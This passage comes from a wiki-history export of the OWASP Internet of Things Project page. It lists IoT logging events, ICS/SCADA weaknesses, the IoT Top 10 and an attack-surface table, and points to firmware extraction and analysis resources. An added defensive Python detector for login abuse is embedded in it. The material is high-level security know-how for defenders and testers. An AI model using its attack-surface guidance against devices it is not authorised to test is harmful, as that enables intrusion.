* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
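As an added example (not code from this OWASP page or any OWASP project), the following Python detector derives three of the events listed above, "Multiple Failed Passwords", "High Rate of Login Attempts" and "Device Accessed Using Default Administrative Credentials", from a constructed device authentication log; the log format, field names and thresholds are assumptions made for this example.

```python
"""Derive OWASP IoT logging-event records from a device authentication log.

Added example, not part of the OWASP wiki page or any OWASP project code.
Event names follow the "IoT Logging Events" table; the log line format,
field names and thresholds below are assumptions for this example.
"""
import json
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log lines in a syslog-like format (not from a real device).
SAMPLE_LOG = """\
2024-01-01T10:00:00 auth user=admin src=10.0.0.5 result=FAIL
2024-01-01T10:00:01 auth user=admin src=10.0.0.5 result=FAIL
2024-01-01T10:00:02 auth user=admin src=10.0.0.5 result=FAIL
2024-01-01T10:00:03 auth user=admin src=10.0.0.5 result=FAIL
2024-01-01T10:00:04 auth user=admin src=10.0.0.5 result=FAIL
2024-01-01T10:00:05 auth user=admin src=10.0.0.5 result=OK cred=default
2024-01-01T10:05:00 auth user=alice src=10.0.0.9 result=OK cred=user
"""

LINE_RE = re.compile(r"(\S+) auth user=(\S+) src=(\S+) result=(\S+)(?: cred=(\S+))?")

FAILED_PASSWORD_THRESHOLD = 3   # consecutive failures per user before an event is raised
RATE_WINDOW_SECONDS = 10        # sliding window for attempt-rate detection
RATE_THRESHOLD = 5              # attempts from one source within the window


def parse(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, user, src, result, cred = m.groups()
    return {"ts": datetime.fromisoformat(ts), "user": user, "src": src,
            "ok": result == "OK", "cred": cred}


def event(category, name, rec):
    """Build a structured event record in the table's category/event vocabulary."""
    return {"category": category, "event": name, "ts": rec["ts"].isoformat(),
            "user": rec["user"], "src": rec["src"]}


def detect_events(log_text):
    """Return the list of events detected, in the order they occur in the log."""
    events = []
    failures = defaultdict(int)    # consecutive failed logins per user
    attempts = defaultdict(deque)  # timestamps per source within the rate window
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        # Sliding-window attempt rate per source address (raised once on crossing).
        window = attempts[rec["src"]]
        window.append(rec["ts"])
        while (rec["ts"] - window[0]).total_seconds() > RATE_WINDOW_SECONDS:
            window.popleft()
        if len(window) == RATE_THRESHOLD:
            events.append(event("Authentication Exceptions",
                                "High Rate of Login Attempts", rec))
        if not rec["ok"]:
            failures[rec["user"]] += 1
            if failures[rec["user"]] == FAILED_PASSWORD_THRESHOLD:
                events.append(event("Authentication Exceptions",
                                    "Multiple Failed Passwords", rec))
        else:
            failures[rec["user"]] = 0
            # A successful login with the factory default credential is itself an event.
            if rec["cred"] == "default":
                events.append(event("Administrative Mode Events",
                                    "Device Accessed Using Default Administrative Credentials", rec))
    return events


if __name__ == "__main__":
    for ev in detect_events(SAMPLE_LOG):
        print(json.dumps(ev))
```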
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program around IoT devices, and companies that want to build such a program have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
Details coming soon. For information on how to get started with contributing, see the "Project Task List" in the download section. <br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* Paulino Calderon<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
* RSA Conference San Francisco, April 21, 2015: [https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project], Daniel Miessler, Practice Principal<br />
* Defcon 23, August 6-9, 2015: [https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping], Daniel Miessler<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>
Aaron.guzman: https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=248642
OWASP Internet of Things Project, revision of 2019-03-12T03:21:39Z
<p>Aaron.guzman: /* News and Events */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including manufacturing, consulting, security testing, development, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT, including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants, whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and that, if you alter, transform, or build upon this work, you distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Lévy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project: [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
